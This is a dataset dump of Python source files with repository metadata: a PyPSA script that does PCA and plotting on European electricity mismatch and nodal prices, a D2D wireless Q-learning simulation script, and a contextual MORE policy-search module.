fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of CO2 constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (CO2)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance'
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance between mismatch and response as a function of CO2 constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (CO2)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
# ------------------ Change in contribution and response transmission ----------------------- #
# Variable to store lambda values
lambdaContributionElec = []
lambdaResponseElec = []
lambdaCovarianceElec = []
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
for file in filename_trans:
# --------------------------- Electricity -------------------------------#
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# PCA on mismatch for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(mismatchElec)
# Contribution Elec
dircConElec = Contribution(network, "elec")
lambdaCollectedConElec = ConValueGenerator(normConstElec, dircConElec, eigenVectorsElec)
lambdaContributionElec.append(lambdaCollectedConElec)
# Response Elec
dircResElec = ElecResponse(network,True)
lambdaCollectedResElec = ConValueGenerator(normConstElec, dircResElec, eigenVectorsElec)
lambdaResponseElec.append(lambdaCollectedResElec)
# Covariance Elec
covMatrix = CovValueGenerator(dircConElec, dircResElec , True, normConstElec,eigenVectorsElec)
lambdaCovarianceElec.append(covMatrix.T)
# general terms
pathContibution = figurePath + "Mismatch\\Change in Contribution\\"
pathResponse = figurePath + "Mismatch\\Change in Response\\"
pathCovariance = figurePath + "Mismatch\\Change in Covariance\\"
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity contribution as a function of transmission constraint"
fig = ChangeContributionElec(lambdaContributionElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cont app (trans)"
SavePlot(fig, pathContibution, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec contribution
figtitle = "Change in electricity response as a function of transmission constraint"
fig = ChangeResponseElec(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in elec covariance response
figtitle = "Change in electricity covariance response as a function of transmission constraint"
fig = ChangeResponseCov(lambdaResponseElec, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec cov response app (trans)"
SavePlot(fig, pathResponse, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=True, PC=2) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance (trans)"
SavePlot(fig, pathCovariance, saveTitle)
# Plot change in covariance
figtitle = "Change in electricity covariance as a function of transmission constraint"
fig = ChangeCovariance(lambdaCovarianceElec, collectTerms=True, rotate=False, PC=6) #figtitle
saveTitle = file[12:-14] + " - Change in elec covariance app (trans)"
SavePlot(fig, pathCovariance, saveTitle)
#%%
##############################################################################
##############################################################################
################################ NODAL PRICE #################################
##############################################################################
##############################################################################
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# ----------------------- Map PC Plot (Elec + Heat) --------------------#
# Path to save plots
path = figurePath + "Nodal Price\\Map PC\\"
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Plot map PC for electricity nodal prices
titlePlotElec = "Nodal price for electricity only"
for i in np.arange(6):
fig = MAP(eigenVectorsElec, eigenValuesElec, dataNames, (i + 1),size="medium")#, titlePlotElec, titleFileName)
title = (file[12:-3] + " - Map PC Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------------ FFT Plot (Elec + Heat) -----------------------#
# Path to save FFT plots
path = figurePath + "Nodal Price\\FFT\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTPlot(TElec.T, varianceExplainedElec, PC_NO = i+1, title=file_name)
title = (file[12:-3] + " - FFT Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ----------------------- Seasonal Plot (Elec + Heat) ------------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Seasonal\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = seasonPlot(TElec, timeIndex, PC_NO=(i+1), PC_amount=6, title=file_name)
title = (file[12:-3] + " - Seasonal Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# -------------------- FFT + Seasonal Plot (Elec) ---------------------#
# Path to save seasonal plots
path = figurePath + "Nodal Price\\Timeseries\\"
# --- Elec ---
file_name = "Electricity Nodal Price - " + file
for i in np.arange(6):
fig = FFTseasonPlot(TElec, timeIndex, varianceExplainedElec, PC_NO=(i+1), PC_amount=6,dpi=200)
title = (file[12:-3] + " - Timeseries Plot Elec NP (lambda " + str(i+1) + ")")
SavePlot(fig, path, title)
# ------------------- PC1 and PC2 combined plot (Elec) -------------------- #
# Path to save contribution plots
path = figurePath + "Nodal Price\\Combined Plot\\"
# --- Elec ---
fig = PC1and2Plotter(TElec, timeIndex, [1,2], eigenValuesElec, lambdaCollectedConElec, lambdaCollectedResElec, covMatrixElec,PCType="withoutProjection")#,suptitle=("Electricity Mismatch - " + file[12:-3]),dpi=200)
title = (file[12:-3] + " - Combined Plot Elec NP (lambda 1 & 2)")
SavePlot(fig, path, title)
#%%
# ---------------------- Bar plot CO2 constraint --------------------------- #
# Path to save bar plots
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_CO2 = ["postnetwork-elec_only_0.125_0.6.h5",
"postnetwork-elec_only_0.125_0.5.h5",
"postnetwork-elec_only_0.125_0.4.h5",
"postnetwork-elec_only_0.125_0.3.h5",
"postnetwork-elec_only_0.125_0.2.h5",
"postnetwork-elec_only_0.125_0.1.h5",
"postnetwork-elec_only_0.125_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixCO2Elec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
stdMeanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_CO2:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixCO2Elec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
constraints = ["40%", "50%", "60%", "70%", "80%", "90%", "95%"]
title = "" #"Number of PC describing variance of network as a function of $CO_{2}$ constraint"
xlabel = "" #"$CO_{2}$ constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixCO2Elec, 7, filename_CO2, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, bbox=(0.5,-0.28))
titleBarCO2Elec = (file[12:-14] + " - Bar CO2 Elec NP")
SavePlot(fig, path, titleBarCO2Elec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3], fontsize=16)
title = (file[12:-14] + " - Elec NP CO2 Evolution")
SavePlot(fig, path, title)
# ------------------ Bar plot Transmission constraint ----------------------- #
# Path
path = figurePath + "Nodal Price\\Bar\\"
# Name of file (must be in correct folder location)
filename_trans = ["postnetwork-elec_only_0_0.05.h5",
"postnetwork-elec_only_0.0625_0.05.h5",
"postnetwork-elec_only_0.125_0.05.h5",
"postnetwork-elec_only_0.25_0.05.h5",
"postnetwork-elec_only_0.375_0.05.h5"]
# Variable to store nodal price PC componentns for each network
barMatrixTransmissionElec = []
# Variable to store nodal price mean and standard variation
meanPriceElec = []
quantileMeanPriceElec = []
quantileMinPriceElec = []
for file in filename_trans:
# Network
network = pypsa.Network(directory + file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# --- Elec ---
# Prices for electricity for each country (restricted to 1000 โฌ/MWh)
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# PCA on nodal prices for electricity
eigenValuesElec, eigenVectorsElec, varianceExplainedElec, normConstElec, TElec = PCA(priceElec)
# Append value to matrix
barMatrixTransmissionElec.append(varianceExplainedElec)
# ----------------------- NP Mean (Elec) --------------------#
# --- Elec ---
# Mean price for country
minPrice = priceElec.min().mean()
meanPrice = priceElec.mean().mean()
# append min, max and mean to matrix
meanPriceElec.append([minPrice, meanPrice])
# ----------------------- NP Quantile (Elec) --------------------#
# --- Elec ---
# Mean price for country
quantileMinPrice = np.quantile(priceElec.min(),[0.05,0.25,0.75,0.95])
quantileMeanPrice = np.quantile(priceElec.mean(),[0.05,0.25,0.75,0.95])
# append min, max and mean to matrix
quantileMeanPriceElec.append(quantileMeanPrice)
quantileMinPriceElec.append(quantileMinPrice)
# ----------------------- Bar plot (Elec) --------------------#
constraints = ["Zero", "Current", "2x Current", "4x Current", "6x Current"]
title = "" #"Number of PC describing variance of network as a function of transmission constraint"
xlabel = "" #"Transmission constraint"
suptitleElec = "" #("Electricity Nodal Price - " + file[12:-14])
fig = BAR(barMatrixTransmissionElec, 7, filename_trans, constraints, title, xlabel, suptitleElec, fontsize=18, figsize=[6, 3], ncol=4, rotation=-17.5, bbox=(0.5,-0.28))
titleBarTransmissionElec = (file[12:-14] + " - Bar Trans Elec NP")
SavePlot(fig, path, titleBarTransmissionElec)
# ----------------------- Price evalution (Elec) --------------------#
path = figurePath + "Nodal Price\\Price Evolution\\"
title = "" #("Electricity Nodal Price Evalution - " + file[12:-14])
fig = PriceEvolution(meanPriceElec,quantileMeanPriceElec, quantileMinPriceElec, networktype="green", title=title, figsize=[6,3.2], fontsize=16)
title = (file[12:-14] + " - Elec NP Trans Evolution")
SavePlot(fig, path, title)
#%%
##############################################################################
##############################################################################
################################# Coherence ##################################
##############################################################################
##############################################################################
# -------------------- Coherence Plot (Elec + Heat) ---------------------#
# File name
file = "postnetwork-elec_only_0.125_0.05.h5"
# Import network
network = pypsa.Network(directory+file)
# Get the names of the data
dataNames = network.buses.index.str.slice(0,2).unique()
# Get time stamps
timeIndex = network.loads_t.p_set.index
# Path to save contribution plots
path = figurePath + "Coherence\\"
# --- Elec ---
# Electricity load for each country
loadElec = network.loads_t.p_set[dataNames]
# Solar PV generation
generationSolar = network.generators_t.p[dataNames + " solar"]
generationSolar.columns = generationSolar.columns.str.slice(0,2)
# Onshore wind generation
generationOnwind = network.generators_t.p[[country for country in network.generators_t.p.columns if "onwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
# Offshore wind generation
# Because offwind is only for 21 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the offwind generation and remove 'NaN' values.
generationOffwind = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationOffwind += network.generators_t.p[[country for country in network.generators_t.p.columns if "offwind" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationOffwind = generationOffwind.replace(np.nan,0)
# RoR generations
# Because RoR is only for 27 countries, additional methods have to be implemented to make it at 8760 x 30 matrix
# Create empty array of 8760 x 30, add the RoR generation and remove 'NaN' values.
generationRoR = pd.DataFrame(np.zeros([8760,30]),index=timeIndex, columns=dataNames)
generationRoR += network.generators_t.p[[country for country in network.generators_t.p.columns if "ror" in country]].groupby(network.generators.bus.str.slice(0,2),axis=1).sum()
generationRoR = generationRoR.replace(np.nan,0)
# Combined generation for electricity
generationElec = generationSolar + generationOnwind + generationOffwind + generationRoR
# Mismatch electricity
mismatchElec = generationElec - loadElec
# Prices for each country
priceElec = FilterPrice(network.buses_t.marginal_price[dataNames], 465)
# Coherence between prices and mismatch
c1Elec, c2Elec, c3Elec = Coherence(mismatchElec, priceElec)
# Plot properties
title1 = "" #"Coherence 1: Electricity mismatch and nodal price"
title2 = "" #"Coherence 2: Electricity mismatch and nodal price"
title3 = "" #"Coherence 3: Electricity mismatch and nodal price"
xlabel = "Electricity Mismatch"
ylabel="Electricity Prices"
noX = 6
noY = 6
fig1 = CoherencePlot(dataMatrix=c1Elec.T, รผbertitle="", title=title1, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig2 = CoherencePlot(dataMatrix=c2Elec.T, รผbertitle="", title=title2, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[0,1])
fig3 = CoherencePlot(dataMatrix=c3Elec.T, รผbertitle="", title=title3, xlabel=xlabel, ylabel=ylabel, noX=noX, noY=noY, dataRange=[-1,1])
SavePlot(fig1, path, title = (file[12:-3] + " - C1 elec mismatch and ENP"))
SavePlot(fig2, path, title = (file[12:-3] + " - C2 elec mismatch and ENP"))
SavePlot(fig3, path, title = (file[12:-3] + " - C3 elec mismatch and ENP"))
# Combined Plot
fig = CoherencePlotCombined(c1Elec.T, c2Elec.T, c3Elec.T, xlabel=xlabel, ylabel=ylabel)
SavePlot(fig, path, title = (file[12:-3] + " - C123 combined elec mismatch and ENP"))
# Finish timer
t1 = time.time() # End timer
total_time = round(t1-t0)
total_time_min = math.floor(total_time/60)
total_time_sec = round(total_time-(total_time_min*60))
print("\n \nThe code is now done running. It took %s min and %s sec." %(total_time_min,total_time_sec))
| 0 | 0 | 0 |
ba87651683190064a49de123288bc017d6c365cd | 4,017 | py | Python | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | 1 | 2020-06-14T13:50:28.000Z | 2020-06-14T13:50:28.000Z | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | null | null | null | scratch/scratch5.py | lbaiao/sys-simulator-2 | 94f00d43309fe7b56dac5099bd4024695ba317b6 | [
"MIT"
] | null | null | null | # Similar to scratch3, but with the BAN channel
from sys_simulator.channels import BANChannel
from sys_simulator import general as gen
from sys_simulator.pathloss import pathloss_bs_users
from sys_simulator.plots import plot_positions_actions_pie
from sys_simulator.q_learning.environments.completeEnvironment5 \
import CompleteEnvironment5
from sys_simulator.q_learning.agents.agent import Agent
from sys_simulator.q_learning.rewards import dis_reward_tensor2
from sys_simulator.parameters.parameters \
import EnvironmentParameters, TrainingParameters, DQNAgentParameters
from matplotlib import pyplot as plt
import os
import torch
import numpy as np
import math
n_mues = 1 # number of mues
n_d2d = 2 # number of d2d pairs
n_rb = n_mues # number of RBs
bs_radius = 500 # bs radius in m
rb_bandwidth = 180*1e3 # rb bandwidth in Hz
d2d_pair_distance = 50 # d2d pair distance in m
p_max = 23 # max tx power in dBm
noise_power = -116 # noise power per RB in dBm
bs_gain = 17 # macro bs antenna gain in dBi
user_gain = 4 # user antenna gain in dBi
sinr_threshold_mue = 6 # true mue sinr threshold in dB
mue_margin = .5e4
# conversions from dB to pow
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold_mue = gen.db_to_power(sinr_threshold_mue)
# q-learning parameters
STEPS_PER_EPISODE = 4000
EPSILON_MIN = 0.01
EPSILON_DECAY = 100 * EPSILON_MIN / STEPS_PER_EPISODE
MAX_NUM_EPISODES = int(1.2/EPSILON_DECAY)
MAX_NUMBER_OF_AGENTS = 20
ALPHA = 0.05 # Learning rate
GAMMA = 0.98 # Discount factor
C = 80 # C constant for the improved reward function
TARGET_UPDATE = 10
REPLAY_MEMORY_SIZE = 10000
BATCH_SIZE = 128
# more parameters
cwd = os.getcwd()
# params objects
env_params = EnvironmentParameters(
rb_bandwidth, d2d_pair_distance, p_max, noise_power,
bs_gain, user_gain, sinr_threshold_mue, n_mues,
n_d2d, n_rb, bs_radius, c_param=C, mue_margin=mue_margin
)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = DQNAgentParameters(
EPSILON_MIN, EPSILON_DECAY, 1,
REPLAY_MEMORY_SIZE, BATCH_SIZE, GAMMA
)
# actions, rewards, environment, agent
actions = torch.tensor([i*0.82*p_max/5/1000 for i in range(5)])
channel = BANChannel()
env = CompleteEnvironment5(env_params, dis_reward_tensor2, channel)
pairs_positions = [
(250, 0),
(-250, 0),
(0, 250),
(0, -250)
]
mue_position = (500 / math.sqrt(2), 500 / math.sqrt(2))
tx_powers_indexes = [
4, 4, 4, 4
]
# actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
actions = [i for i in range(5)] # best result
n_agents = len(pairs_positions)
| 34.930435 | 73 | 0.731641 | # Similar to scratch3, but with the BAN channel
from sys_simulator.channels import BANChannel
from sys_simulator import general as gen
from sys_simulator.pathloss import pathloss_bs_users
from sys_simulator.plots import plot_positions_actions_pie
from sys_simulator.q_learning.environments.completeEnvironment5 \
import CompleteEnvironment5
from sys_simulator.q_learning.agents.agent import Agent
from sys_simulator.q_learning.rewards import dis_reward_tensor2
from sys_simulator.parameters.parameters \
import EnvironmentParameters, TrainingParameters, DQNAgentParameters
from matplotlib import pyplot as plt
import os
import torch
import numpy as np
import math
n_mues = 1 # number of mues
n_d2d = 2 # number of d2d pairs
n_rb = n_mues # number of RBs
bs_radius = 500 # bs radius in m
rb_bandwidth = 180*1e3 # rb bandwidth in Hz
d2d_pair_distance = 50 # d2d pair distance in m
p_max = 23 # max tx power in dBm
noise_power = -116 # noise power per RB in dBm
bs_gain = 17 # macro bs antenna gain in dBi
user_gain = 4 # user antenna gain in dBi
sinr_threshold_mue = 6 # true mue sinr threshold in dB
mue_margin = .5e4
# conversions from dB to pow
p_max = p_max - 30
p_max = gen.db_to_power(p_max)
noise_power = noise_power - 30
noise_power = gen.db_to_power(noise_power)
bs_gain = gen.db_to_power(bs_gain)
user_gain = gen.db_to_power(user_gain)
sinr_threshold_mue = gen.db_to_power(sinr_threshold_mue)
# q-learning parameters
STEPS_PER_EPISODE = 4000
EPSILON_MIN = 0.01
EPSILON_DECAY = 100 * EPSILON_MIN / STEPS_PER_EPISODE
MAX_NUM_EPISODES = int(1.2/EPSILON_DECAY)
MAX_NUMBER_OF_AGENTS = 20
ALPHA = 0.05 # Learning rate
GAMMA = 0.98 # Discount factor
C = 80 # C constant for the improved reward function
TARGET_UPDATE = 10
REPLAY_MEMORY_SIZE = 10000
BATCH_SIZE = 128
# more parameters
cwd = os.getcwd()
# params objects
env_params = EnvironmentParameters(
rb_bandwidth, d2d_pair_distance, p_max, noise_power,
bs_gain, user_gain, sinr_threshold_mue, n_mues,
n_d2d, n_rb, bs_radius, c_param=C, mue_margin=mue_margin
)
train_params = TrainingParameters(MAX_NUM_EPISODES, STEPS_PER_EPISODE)
agent_params = DQNAgentParameters(
EPSILON_MIN, EPSILON_DECAY, 1,
REPLAY_MEMORY_SIZE, BATCH_SIZE, GAMMA
)
# actions, rewards, environment, agent
actions = torch.tensor([i*0.82*p_max/5/1000 for i in range(5)])
channel = BANChannel()
env = CompleteEnvironment5(env_params, dis_reward_tensor2, channel)
pairs_positions = [
(250, 0),
(-250, 0),
(0, 250),
(0, -250)
]
mue_position = (500 / math.sqrt(2), 500 / math.sqrt(2))
tx_powers_indexes = [
4, 4, 4, 4
]
# actions = [i*0.82*p_max/5/1000 for i in range(5)] # best result
actions = [i for i in range(5)] # best result
n_agents = len(pairs_positions)
def run():
if len(pairs_positions) != len(tx_powers_indexes):
raise Exception(
'Different `pair_positions` and `tx_powers_indexes` lengths.'
)
agents = [Agent(agent_params, actions)
for _ in range(n_agents)] # 1 agent per d2d tx
env.set_scenario(pairs_positions, mue_position, agents)
obs = [env.get_state(a) for a in agents]
total_reward = 0.0
for j, agent in enumerate(agents):
agent.set_action(tx_powers_indexes[j])
next_obs, rewards, _ = env.step(agents)
obs = next_obs
total_reward += sum(rewards)
d2d_txs, d2d_rxs = zip(*env.d2d_pairs)
# D2D interference on the MUE
d2d_interferences = [
d.tx_power * env.params.user_gain * env.params.bs_gain /
pathloss_bs_users(d.distance_to_bs/1000) for d in d2d_txs
]
d2d_total_interference = np.sum(d2d_interferences)
percentage_interferences = d2d_interferences / d2d_total_interference
if d2d_total_interference != 0:
plot_positions_actions_pie(
env.bs, env.mue, d2d_txs, d2d_rxs,
tx_powers_indexes, percentage_interferences,
obs[0][0][4].item(), sinr_threshold_mue,
env.reward.item()
)
# show plots
plt.show()
| 1,238 | 0 | 23 |
c5fd6aab5a84d25789ea2f8ec3a5bf04566738c0 | 8,691 | py | Python | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 8 | 2021-06-21T18:58:56.000Z | 2021-12-13T09:47:41.000Z | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | null | null | null | reps/cmore.py | hanyas/reps | 447c461b89dec516ce3368d841cfe9734be78199 | [
"MIT"
] | 1 | 2021-06-29T04:42:45.000Z | 2021-06-29T04:42:45.000Z | import autograd.numpy as np
import scipy as sc
from scipy import optimize
from scipy import special
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
import copy
| 30.928826 | 108 | 0.5149 | import autograd.numpy as np
import scipy as sc
from scipy import optimize
from scipy import special
from sklearn.preprocessing import PolynomialFeatures
from sklearn.linear_model import Ridge
import copy
class Policy:
def __init__(self, context_dim, act_dim, degree, cov0):
self.context_dim = context_dim
self.act_dim = act_dim
self.degree = degree
self.basis = PolynomialFeatures(self.degree, include_bias=False)
self.nb_feat = int(sc.special.comb(self.degree + self.context_dim, self.degree) - 1)
self.b = 1e-8 * np.random.randn(self.act_dim, )
self.K = 1e-8 * np.random.randn(self.act_dim, self.nb_feat)
self.cov = cov0 * np.eye(act_dim)
def features(self, c):
return self.basis.fit_transform(c.reshape(-1, self.context_dim))
def mean(self, c):
feat = self.features(c)
return self.b + np.einsum('...k,mk->...m', feat, self.K)
def action(self, c, stoch=True):
mean = self.mean(c)
if stoch:
return np.array([np.random.multivariate_normal(mu, self.cov) for mu in mean])
else:
return mean
def kli(self, pi, c):
diff = self.mean(c) - pi.mean(c)
kl = 0.5 * (np.trace(np.linalg.inv(self.cov) @ pi.cov) +
np.mean(np.einsum('nk,kh,nh->n', diff, np.linalg.inv(self.cov), diff), axis=0) -
self.act_dim + np.log(np.linalg.det(self.cov) / np.linalg.det(pi.cov)))
return kl
def entropy(self):
return 0.5 * np.log(np.linalg.det(self.cov * 2.0 * np.pi * np.exp(1.0)))
def update(self, eta, omega, model):
pol = copy.deepcopy(self)
Raa, Rac, ra = model.Raa, model.Rac, model.ra
b, K = self.b, self.K
Q = self.cov
Qi = np.linalg.inv(Q)
F = np.linalg.inv(eta * Qi - 2.0 * Raa)
L = eta * (Qi @ K) + 2.0 * Rac
f = eta * (Qi @ b) + ra
pol.cov = F * (eta + omega)
pol.b = F @ f
pol.K = F @ L
return pol
class Model:
def __init__(self, act_dim, nb_cntxt_feat):
self.nb_cntxt_feat = nb_cntxt_feat
self.act_dim = act_dim
self.R = np.zeros((self.act_dim + self.nb_cntxt_feat, self.act_dim + self.nb_cntxt_feat))
self.r = np.zeros((self.act_dim + self.nb_cntxt_feat, ))
self.Raa = np.zeros((self.act_dim, self.act_dim))
self.ra = np.zeros((self.act_dim,))
self.Rcc = np.zeros((self.nb_cntxt_feat, self.nb_cntxt_feat))
self.rc = np.zeros((self.nb_cntxt_feat, ))
self.Rac = np.zeros((self.act_dim, self.nb_cntxt_feat))
self.r0 = np.zeros((1, ))
def fit(self, phi, x, r):
poly = PolynomialFeatures(2)
input = np.hstack((x, phi))
feat = poly.fit_transform(input)
reg = Ridge(alpha=1e-4, fit_intercept=False)
reg.fit(feat, r)
par = reg.coef_
self.r0 = par[0]
self.r = par[1:self.act_dim + self.nb_cntxt_feat + 1]
uid = np.triu_indices(self.act_dim + self.nb_cntxt_feat)
self.R[uid] = par[self.act_dim + self.nb_cntxt_feat + 1:]
self.R.T[uid] = self.R[uid]
self.Raa = self.R[:self.act_dim, :self.act_dim]
self.Rcc = self.R[-self.nb_cntxt_feat:, -self.nb_cntxt_feat:]
self.Rac = self.R[:self.act_dim, -self.nb_cntxt_feat:]
self.ra = 2.0 * self.r[:self.act_dim]
self.rc = 2.0 * self.r[self.act_dim:]
# check for positive definitness
w, v = np.linalg.eig(self.Raa)
w[w >= 0.0] = -1e-12
self.Raa = v @ np.diag(w) @ v.T
self.Raa = 0.5 * (self.Raa + self.Raa.T)
class cMORE:
def __init__(self, func, nb_episodes,
kl_bound, ent_rate,
cntxt_degree, **kwargs):
self.func = func
self.act_dim = self.func.act_dim
self.cntxt_dim = self.func.cntxt_dim
self.nb_episodes = nb_episodes
self.kl_bound = kl_bound
self.ent_rate = ent_rate
self.cntxt_degree = cntxt_degree
self.basis = PolynomialFeatures(self.cntxt_degree, include_bias=False)
self.nb_cntxt_feat = int(sc.special.comb(self.cntxt_degree + self.cntxt_dim, self.cntxt_degree) - 1)
cov0 = kwargs.get('cov0', 100.)
self.ctl = Policy(self.act_dim, self.cntxt_dim,
self.cntxt_degree, cov0)
self.h0 = kwargs.get('h0', 75.0)
self.model = Model(self.act_dim, self.nb_cntxt_feat)
self.eta = np.array([1.0])
self.omega = np.array([1.0])
self.data = None
self.phi = None
